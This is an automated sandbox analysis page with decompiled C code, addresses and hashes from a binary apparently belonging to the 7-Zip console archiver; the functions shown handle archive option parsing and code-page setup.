                                                                                  • EnterCriticalSection.KERNEL32(00490A88), ref: 0040657C
                                                                                  • LeaveCriticalSection.KERNEL32(00490A88), ref: 0040658D
                                                                                  • LeaveCriticalSection.KERNEL32(00490A88), ref: 004065D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                  • String ID: Anti item $Compressing
                                                                                  • API String ID: 2532973370-3992608634
                                                                                  • Opcode ID: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
                                                                                  • Instruction ID: 580c09916b0a3b3df052708d1afcafaf12a43b80893965563734f36f16cd3c83
                                                                                  • Opcode Fuzzy Hash: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
                                                                                  • Instruction Fuzzy Hash: 6D01B571A00244BFDB21EF25DC85B6EB7E4AF49314F01483FE047A65D1C7BC99548769
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004256CE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 374COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E004256CE(void* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t153;
				signed int _t155;
				signed int _t158;
				intOrPtr* _t160;
				signed int* _t161;
				void* _t163;
				signed int _t178;
				signed int _t182;
				signed int* _t183;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t209;
				signed int _t213;
				intOrPtr* _t218;
				signed int _t220;
				void* _t223;
				intOrPtr _t236;
				signed int _t237;
				void* _t273;
				signed int* _t299;
				intOrPtr _t306;
				intOrPtr _t307;
				signed int _t313;
				signed int _t315;
				void* _t316;

				L0046B890(0x4765a8, _t316);
				_t311 = __ecx;
				L00403532(_t316 - 0x20,  *((intOrPtr*)(_t316 + 8)));
				_t305 = 0;
				 *((intOrPtr*)(_t316 - 4)) = 0;
				L00407ED0( *((intOrPtr*)(_t316 - 0x20)));
				if( *(_t316 - 0x1c) != 0) {
					_t228 =  *((intOrPtr*)(_t316 - 0x20));
					_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t316 - 0x20))));
					__eflags = _t148 - 0x58;
					if(_t148 != 0x58) {
						__eflags = _t148 - 0x53;
						if(_t148 != 0x53) {
							_t149 = E00408053(_t228, L"CRC");
							__eflags = _t149;
							if(_t149 != 0) {
								_t220 = E004263BA(_t316 - 0x20, _t316 - 0x10);
								L004072C9(_t316 - 0x20, _t316 - 0x2c, _t220);
								__eflags = _t220;
								 *((char*)(_t316 - 4)) = 1;
								if(_t220 != 0) {
									L42:
									__eflags =  *(_t316 - 0x10) - 0x2710;
									if( *(_t316 - 0x10) <= 0x2710) {
										_t153 =  *((intOrPtr*)(_t311 + 0x44));
										__eflags =  *(_t316 - 0x10) - _t153;
										if( *(_t316 - 0x10) >= _t153) {
											_t306 =  *((intOrPtr*)(_t311 + 0x10));
											 *(_t316 - 0x10) =  *(_t316 - 0x10) - _t153;
											__eflags = _t306 -  *(_t316 - 0x10);
											if(_t306 >  *(_t316 - 0x10)) {
												L49:
												_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t311 + 0x14)) +  *(_t316 - 0x10) * 4));
												__eflags =  *(_t316 - 0x28);
												 *((intOrPtr*)(_t316 - 0x14)) = _t307;
												if( *(_t316 - 0x28) != 0) {
													_t155 = E00425B6E(_t316 - 0x2c);
													__eflags = _t155;
													if(_t155 < 0) {
														L60:
														L00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														L00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = 0x80070057;
														goto L73;
													}
													 *((short*)(_t316 - 0x48)) = 0;
													 *((short*)(_t316 - 0x46)) = 0;
													_t160 = 0x48c9b0 + (_t155 + _t155 * 2) * 4;
													_t236 =  *_t160;
													 *((char*)(_t316 - 4)) = 7;
													__eflags = _t236 - 4;
													 *((intOrPtr*)(_t316 - 0x50)) = _t236;
													if(_t236 == 4) {
														L61:
														_t161 =  *(_t160 + 8);
														_t237 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *_t161;
															if( *_t161 == 0) {
																break;
															}
															_t237 = _t237 + 1;
															_t161 =  &(_t161[0]);
														}
														_t163 = L004072C9(_t316 - 0x2c, _t316 - 0x38, _t237);
														_push(_t316 + 8);
														 *((char*)(_t316 - 4)) = 8;
														_t305 = E00426261(_t163,  *(_t316 + 0xc), _t311);
														 *((char*)(_t316 - 4)) = 7;
														L00407A18( *((intOrPtr*)(_t316 - 0x38)));
														__eflags = _t305;
														if(_t305 == 0) {
															E0040C1A0(_t316 - 0x48,  *((intOrPtr*)(_t316 + 8)));
															__eflags =  *(_t316 - 0x10) -  *((intOrPtr*)(_t311 + 0x50));
															if( *(_t316 - 0x10) <=  *((intOrPtr*)(_t311 + 0x50))) {
																 *((intOrPtr*)(_t311 + 0x4c)) =  *((intOrPtr*)(_t316 + 8));
															}
															L69:
															_push(_t316 - 0x50);
															E00425C04( *((intOrPtr*)(_t316 - 0x14)));
															 *((char*)(_t316 - 4)) = 1;
															E0040C20F(_t316 - 0x48);
															L70:
															_t313 = 0;
															__eflags = 0;
															L71:
															L00407A18( *((intOrPtr*)(_t316 - 0x2c)));
															goto L72;
														}
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														L66:
														L00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														L00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = _t305;
														goto L73;
													}
													__eflags = _t236 - 1;
													if(_t236 == 1) {
														goto L61;
													}
													__eflags = _t236 - 2;
													if(_t236 == 2) {
														goto L61;
													}
													_t178 = E0042518A(_t316 - 0x2c);
													__eflags = _t178;
													if(_t178 < 0) {
														L59:
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														goto L60;
													}
													_t180 = _t178 + _t178 * 2;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													 *((intOrPtr*)(_t316 - 0x50)) =  *((intOrPtr*)(0x48c9b0 + (_t178 + _t178 * 2) * 4));
													asm("movsd");
													_t182 = E00425124( *((intOrPtr*)(0x48c9b0 + _t180 * 4 + 4)), _t316 - 0x48);
													__eflags = _t182;
													if(_t182 != 0) {
														goto L69;
													}
													goto L59;
												}
												_t183 =  *(_t316 + 0xc);
												__eflags =  *_t183 - 8;
												if( *_t183 != 8) {
													goto L45;
												}
												L00403532(_t316 - 0x38, _t183[2]);
												_push(_t316 - 0x38);
												_push(_t307);
												 *((char*)(_t316 - 4)) = 6;
												_t313 = E004251BA(_t311, __eflags);
												L00407A18( *((intOrPtr*)(_t316 - 0x38)));
												__eflags = _t313;
												if(_t313 == 0) {
													goto L70;
												}
												goto L71;
											}
											_t223 = _t311 + 8;
											do {
												E00405B9F(_t316 - 0x58);
												 *((intOrPtr*)(_t316 - 0x58)) = 0x47b178;
												 *((char*)(_t316 - 4)) = 4;
												L0040351A(_t316 - 0x44);
												_push(_t316 - 0x58);
												 *((char*)(_t316 - 4)) = 5;
												E00425C5B(_t223, _t306);
												 *((char*)(_t316 - 4)) = 1;
												L00422D4A(_t316 - 0x58);
												_t306 = _t306 + 1;
												__eflags = _t306 -  *(_t316 - 0x10);
											} while (_t306 <=  *(_t316 - 0x10));
											goto L49;
										}
										L45:
										_t313 = 0x80070057;
										goto L71;
									}
									_t313 = 0x80004005;
									goto L71;
								}
								L00407399(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 2;
								_t195 = E0040807A(0x48c4a8);
								__eflags = _t195;
								 *((char*)(_t316 - 4)) = 1;
								L00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t220 & 0xffffff00 | _t195 == 0x00000000;
								if((_t220 & 0xffffff00 | _t195 == 0x00000000) == 0) {
									_t197 = E0040807A(L"RSFX");
									__eflags = _t197;
									if(_t197 != 0) {
										_t198 = E0040807A("F");
										__eflags = _t198;
										if(_t198 != 0) {
											_t199 = E0040807A(L"HC");
											__eflags = _t199;
											if(_t199 != 0) {
												_t200 = E0040807A(L"HCF");
												__eflags = _t200;
												if(_t200 != 0) {
													_t201 = E0040807A(L"HE");
													__eflags = _t201;
													if(_t201 != 0) {
														_t202 = E0040807A(L"TC");
														__eflags = _t202;
														if(_t202 != 0) {
															_t203 = E0040807A(L"TA");
															__eflags = _t203;
															if(_t203 != 0) {
																_t204 = E0040807A(L"TM");
																__eflags = _t204;
																if(_t204 != 0) {
																	_t205 = E0040807A(0x48bb98);
																	__eflags = _t205;
																	if(_t205 != 0) {
																		 *(_t316 - 0x10) = 0;
																		goto L42;
																	}
																	_t299 =  *(_t316 + 0xc);
																	_t273 = _t311 + 0x40;
																	L34:
																	_t206 = E0042633E(_t273, _t299);
																	L30:
																	_t313 = _t206;
																	goto L71;
																}
																_t299 =  *(_t316 + 0xc);
																_t273 = _t311 + 0x37;
																goto L34;
															}
															_t299 =  *(_t316 + 0xc);
															_t273 = _t311 + 0x36;
															goto L34;
														}
														_t299 =  *(_t316 + 0xc);
														_t273 = _t311 + 0x35;
														goto L34;
													}
													_t206 = E0042633E(_t311 + 0x34,  *(_t316 + 0xc));
													__eflags = _t206;
													if(_t206 == 0) {
														 *((char*)(_t311 + 0x33)) = 1;
														goto L70;
													}
													goto L30;
												}
												 *((char*)(_t316 + 0xb)) = 1;
												_t207 = E0042633E(_t316 + 0xb,  *(_t316 + 0xc));
												__eflags = _t207;
												if(_t207 == 0) {
													__eflags =  *((char*)(_t316 + 0xb));
													if( *((char*)(_t316 + 0xb)) == 0) {
														_t305 = 0x80070057;
													}
												} else {
													_t305 = _t207;
												}
												goto L66;
											}
											_t299 =  *(_t316 + 0xc);
											_t273 = _t311 + 0x32;
											goto L34;
										}
										_t299 =  *(_t316 + 0xc);
										_t273 = _t311 + 0x38;
										goto L34;
									}
									_t299 =  *(_t316 + 0xc);
									_t273 = _t311 + 0x1c;
									goto L34;
								}
								_t209 = L004072C9(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 3;
								_t313 = E004263EB(_t209,  *(_t316 + 0xc),  *((intOrPtr*)(_t311 + 0x48)), _t311);
								L00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t313;
								if(_t313 != 0) {
									goto L71;
								}
								goto L70;
							}
							_t315 = __ecx + 4;
							__eflags = _t315;
							 *_t315 = 4;
							L004075A5(_t316 - 0x20, 0, 3);
							_push(_t315);
							goto L12;
						}
						L004075A5(_t316 - 0x20, 0, 1);
						__eflags =  *(_t316 - 0x1c);
						if( *(_t316 - 0x1c) != 0) {
							__eflags =  *( *(_t316 + 0xc));
							if( *( *(_t316 + 0xc)) != 0) {
								goto L1;
							}
							_push(_t316 - 0x20);
							_t213 = E0042547B(__ecx);
						} else {
							_push( *(_t316 + 0xc));
							_t213 = E00425585(__ecx);
						}
						goto L7;
					} else {
						L004075A5(_t316 - 0x20, 0, 1);
						_t218 = __ecx + 0x3c;
						_push(_t218);
						 *_t218 = 9;
						L12:
						_t213 = E00426145(_t316 - 0x20,  *(_t316 + 0xc));
						L7:
						_t313 = _t213;
						L72:
						L00407A18( *((intOrPtr*)(_t316 - 0x20)));
						_t158 = _t313;
						L73:
						 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
						return _t158;
					}
				}
				L1:
				_t313 = 0x80070057;
				goto L72;
			}










































                                                                                  0x004256d3
                                                                                  0x004256de
                                                                                  0x004256e6
                                                                                  0x004256ee
                                                                                  0x004256f0
                                                                                  0x004256f3
                                                                                  0x004256fb
                                                                                  0x00425707
                                                                                  0x0042570a
                                                                                  0x0042570d
                                                                                  0x00425711
                                                                                  0x0042572a
                                                                                  0x0042572e
                                                                                  0x0042576b
                                                                                  0x00425770
                                                                                  0x00425772
                                                                                  0x004257a1
                                                                                  0x004257ab
                                                                                  0x004257b0
                                                                                  0x004257b2
                                                                                  0x004257b6
                                                                                  0x00425957
                                                                                  0x00425957
                                                                                  0x0042595e
                                                                                  0x0042596a
                                                                                  0x0042596d
                                                                                  0x00425970
                                                                                  0x0042597c
                                                                                  0x0042597f
                                                                                  0x00425982
                                                                                  0x00425985
                                                                                  0x004259c6
                                                                                  0x004259ce
                                                                                  0x004259d1
                                                                                  0x004259d4
                                                                                  0x004259d7
                                                                                  0x00425a18
                                                                                  0x00425a1d
                                                                                  0x00425a1f
                                                                                  0x00425a97
                                                                                  0x00425a9a
                                                                                  0x00425aa2
                                                                                  0x00425aa8
                                                                                  0x00000000
                                                                                  0x00425aad
                                                                                  0x00425a24
                                                                                  0x00425a28
                                                                                  0x00425a2c
                                                                                  0x00425a33
                                                                                  0x00425a35
                                                                                  0x00425a39
                                                                                  0x00425a3c
                                                                                  0x00425a3f
                                                                                  0x00425ab3
                                                                                  0x00425ab3
                                                                                  0x00425ab6
                                                                                  0x00425ab6
                                                                                  0x00425ab8
                                                                                  0x00425ab8
                                                                                  0x00425abb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00425abd
                                                                                  0x00425abf
                                                                                  0x00425abf
                                                                                  0x00425aca
                                                                                  0x00425ad5
                                                                                  0x00425ad8
                                                                                  0x00425ae4
                                                                                  0x00425ae6
                                                                                  0x00425aea
                                                                                  0x00425aef
                                                                                  0x00425af2
                                                                                  0x00425b1c
                                                                                  0x00425b24
                                                                                  0x00425b27
                                                                                  0x00425b2c
                                                                                  0x00425b2c
                                                                                  0x00425b2f
                                                                                  0x00425b35
                                                                                  0x00425b36
                                                                                  0x00425b3e
                                                                                  0x00425b42
                                                                                  0x00425b47
                                                                                  0x00425b47
                                                                                  0x00425b47
                                                                                  0x00425b49
                                                                                  0x00425b4c
                                                                                  0x00000000
                                                                                  0x00425b51
                                                                                  0x00425af7
                                                                                  0x00425afb
                                                                                  0x00425b00
                                                                                  0x00425b03
                                                                                  0x00425b0b
                                                                                  0x00425b11
                                                                                  0x00000000
                                                                                  0x00425b13
                                                                                  0x00425a41
                                                                                  0x00425a44
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00425a46
                                                                                  0x00425a49
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00425a4e
                                                                                  0x00425a53
                                                                                  0x00425a55
                                                                                  0x00425a8b
                                                                                  0x00425a8e
                                                                                  0x00425a92
                                                                                  0x00000000
                                                                                  0x00425a92
                                                                                  0x00425a5f
                                                                                  0x00425a62
                                                                                  0x00425a71
                                                                                  0x00425a72
                                                                                  0x00425a73
                                                                                  0x00425a7d
                                                                                  0x00425a7e
                                                                                  0x00425a83
                                                                                  0x00425a85
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00425a85
                                                                                  0x004259d9
                                                                                  0x004259dc
                                                                                  0x004259e0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004259e8
                                                                                  0x004259f2
                                                                                  0x004259f3
                                                                                  0x004259f4
                                                                                  0x00425a00
                                                                                  0x00425a02
                                                                                  0x00425a07
                                                                                  0x00425a0a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00425a10
                                                                                  0x00425987
                                                                                  0x0042598a
                                                                                  0x0042598d
                                                                                  0x00425992
                                                                                  0x0042599c
                                                                                  0x004259a0
                                                                                  0x004259aa
                                                                                  0x004259ab
                                                                                  0x004259af
                                                                                  0x004259b7
                                                                                  0x004259bb
                                                                                  0x004259c0
                                                                                  0x004259c1
                                                                                  0x004259c1
                                                                                  0x00000000
                                                                                  0x0042598a
                                                                                  0x00425972
                                                                                  0x00425972
                                                                                  0x00000000
                                                                                  0x00425972
                                                                                  0x00425960
                                                                                  0x00000000
                                                                                  0x00425960
                                                                                  0x004257c5
                                                                                  0x004257d1
                                                                                  0x004257d5
                                                                                  0x004257dd
                                                                                  0x004257e2
                                                                                  0x004257e6
                                                                                  0x004257eb
                                                                                  0x004257ee
                                                                                  0x00425830
                                                                                  0x00425835
                                                                                  0x00425837
                                                                                  0x0042584c
                                                                                  0x00425851
                                                                                  0x00425853
                                                                                  0x00425868
                                                                                  0x0042586d
                                                                                  0x0042586f
                                                                                  0x00425884
                                                                                  0x00425889
                                                                                  0x0042588b
                                                                                  0x004258c3
                                                                                  0x004258c8
                                                                                  0x004258ca
                                                                                  0x004258f3
                                                                                  0x004258f8
                                                                                  0x004258fa
                                                                                  0x00425911
                                                                                  0x00425916
                                                                                  0x00425918
                                                                                  0x0042592a
                                                                                  0x0042592f
                                                                                  0x00425931
                                                                                  0x00425943
                                                                                  0x00425948
                                                                                  0x0042594a
                                                                                  0x00425954
                                                                                  0x00000000
                                                                                  0x00425954
                                                                                  0x0042594c
                                                                                  0x0042594f
                                                                                  0x00425902
                                                                                  0x00425902
                                                                                  0x004258db
                                                                                  0x004258db
                                                                                  0x00000000
                                                                                  0x004258db
                                                                                  0x00425933
                                                                                  0x00425936
                                                                                  0x00000000
                                                                                  0x00425936
                                                                                  0x0042591a
                                                                                  0x0042591d
                                                                                  0x00000000
                                                                                  0x0042591d
                                                                                  0x004258fc
                                                                                  0x004258ff
                                                                                  0x00000000
                                                                                  0x004258ff
                                                                                  0x004258d2
                                                                                  0x004258d7
                                                                                  0x004258d9
                                                                                  0x004258e2
                                                                                  0x00000000
                                                                                  0x004258e2
                                                                                  0x00000000
                                                                                  0x004258d9
                                                                                  0x00425893
                                                                                  0x00425897
                                                                                  0x0042589c
                                                                                  0x0042589e
                                                                                  0x004258a7
                                                                                  0x004258ab
                                                                                  0x004258b1
                                                                                  0x004258b1
                                                                                  0x004258a0
                                                                                  0x004258a0
                                                                                  0x004258a0
                                                                                  0x00000000
                                                                                  0x0042589e
                                                                                  0x00425871
                                                                                  0x00425874
                                                                                  0x00000000
                                                                                  0x00425874
                                                                                  0x00425855
                                                                                  0x00425858
                                                                                  0x00000000
                                                                                  0x00425858
                                                                                  0x00425839
                                                                                  0x0042583c
                                                                                  0x00000000
                                                                                  0x0042583c
                                                                                  0x004257f9
                                                                                  0x00425807
                                                                                  0x00425813
                                                                                  0x00425815
                                                                                  0x0042581a
                                                                                  0x0042581d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00425823
                                                                                  0x00425774
                                                                                  0x00425774
                                                                                  0x0042577d
                                                                                  0x00425783
                                                                                  0x00425788
                                                                                  0x00000000
                                                                                  0x00425788
                                                                                  0x00425736
                                                                                  0x0042573b
                                                                                  0x0042573e
                                                                                  0x00425754
                                                                                  0x00425757
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042575e
                                                                                  0x0042575f
                                                                                  0x00425740
                                                                                  0x00425740
                                                                                  0x00425745
                                                                                  0x00425745
                                                                                  0x00000000
                                                                                  0x00425713
                                                                                  0x00425719
                                                                                  0x0042571e
                                                                                  0x00425721
                                                                                  0x00425722
                                                                                  0x00425789
                                                                                  0x0042578f
                                                                                  0x0042574a
                                                                                  0x0042574a
                                                                                  0x00425b52
                                                                                  0x00425b55
                                                                                  0x00425b5b
                                                                                  0x00425b5d
                                                                                  0x00425b62
                                                                                  0x00425b6b
                                                                                  0x00425b6b
                                                                                  0x00425711
                                                                                  0x004256fd
                                                                                  0x004256fd
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004256D3
                                                                                    • Part of subcall function 00407ED0: __EH_prolog.LIBCMT ref: 00407ED5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: CRC$HCF$RSFX$-B
                                                                                  • API String ID: 3519838083-950596765
                                                                                  • Opcode ID: 81c17ac54e65c1df555e127d28f88444a92df1476759999909bb7db1c08ade0f
                                                                                  • Instruction ID: 6c3dbe44b38eb95146665e90f90a400f3930304e0ccaa8816579fca9b7e0a093
                                                                                  • Opcode Fuzzy Hash: 81c17ac54e65c1df555e127d28f88444a92df1476759999909bb7db1c08ade0f
                                                                                  • Instruction Fuzzy Hash: 94E1C230A00529DBCF10EB95E8919EEB771EF44314FA0852FE44277291DB7CAA45CB6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00471830 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E00471830(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0046E56A(0x19);
				_t50 = E004719DD(_a4);
				_t85 = _t50 -  *0x496228; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00471A5A();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x490638;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x490728;
							if(_t36 < 0x490728) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x49384c;
									if( *0x49384c == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x496444 =  *0x496444 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x496340, 0, _t60 << 2);
									asm("stosb");
									 *0x496228 = _t50;
									if(__eflags <= 0) {
										 *0x49623c =  *0x49623c & 0x00000000;
										__eflags =  *0x49623c;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x496341) =  *(_t49 + 0x496341) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x496341) =  *(_t47 + 0x496341) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x496444 = E00471A27(_t50);
										 *0x49623c = _t81;
									}
									_t71 = 0x496230;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E00471A83(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x496340, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t51 = _t79 + 0x490648;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t66 = _t57[1];
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x490630; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x496341) =  *(_t41 + 0x496341) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						_t39 = _a4;
						 *0x49623c = 1;
						 *0x496228 = _a4;
						_t40 = E00471A27(_t39);
						_t71 = 0x496230;
						asm("movsd");
						asm("movsd");
						 *0x496444 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				L0046E5CB(0x19);
				return _t77;
			}
































                                                                                  0x0047183b
                                                                                  0x00471848
                                                                                  0x0047184b
                                                                                  0x00471852
                                                                                  0x00471855
                                                                                  0x0047185e
                                                                                  0x00471860
                                                                                  0x004719bc
                                                                                  0x004719bc
                                                                                  0x00471866
                                                                                  0x00471866
                                                                                  0x00471866
                                                                                  0x00471868
                                                                                  0x0047186d
                                                                                  0x0047186d
                                                                                  0x0047186f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00471871
                                                                                  0x00471874
                                                                                  0x00471875
                                                                                  0x0047187a
                                                                                  0x00000000
                                                                                  0x0047187c
                                                                                  0x00471881
                                                                                  0x00471889
                                                                                  0x0047188a
                                                                                  0x0047188c
                                                                                  0x004719b3
                                                                                  0x004719ba
                                                                                  0x004719cb
                                                                                  0x004719cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00471892
                                                                                  0x00471894
                                                                                  0x0047189b
                                                                                  0x004718a3
                                                                                  0x004718a6
                                                                                  0x004718a8
                                                                                  0x004718a9
                                                                                  0x004718af
                                                                                  0x004719a0
                                                                                  0x004719a0
                                                                                  0x004718b5
                                                                                  0x004718b5
                                                                                  0x004718b9
                                                                                  0x004718bf
                                                                                  0x004718c2
                                                                                  0x004718c2
                                                                                  0x004718c4
                                                                                  0x004718c6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004718cc
                                                                                  0x004718d0
                                                                                  0x004718d3
                                                                                  0x004718d3
                                                                                  0x004718d5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004718db
                                                                                  0x004718e2
                                                                                  0x004718e2
                                                                                  0x00471970
                                                                                  0x00471971
                                                                                  0x00471975
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00471975
                                                                                  0x004718c2
                                                                                  0x0047197b
                                                                                  0x0047197b
                                                                                  0x0047197d
                                                                                  0x0047197d
                                                                                  0x00471984
                                                                                  0x00471985
                                                                                  0x00471985
                                                                                  0x00471993
                                                                                  0x00471998
                                                                                  0x00471998
                                                                                  0x004719a9
                                                                                  0x004719ae
                                                                                  0x004719af
                                                                                  0x004719b0
                                                                                  0x004719c1
                                                                                  0x004719c1
                                                                                  0x00000000
                                                                                  0x004719c1
                                                                                  0x0047188c
                                                                                  0x00000000
                                                                                  0x0047187a
                                                                                  0x004718e5
                                                                                  0x004718eb
                                                                                  0x004718f6
                                                                                  0x004718f8
                                                                                  0x004718f8
                                                                                  0x004718fb
                                                                                  0x004718fc
                                                                                  0x00471902
                                                                                  0x00471902
                                                                                  0x00471905
                                                                                  0x00471907
                                                                                  0x00471909
                                                                                  0x00471909
                                                                                  0x0047190c
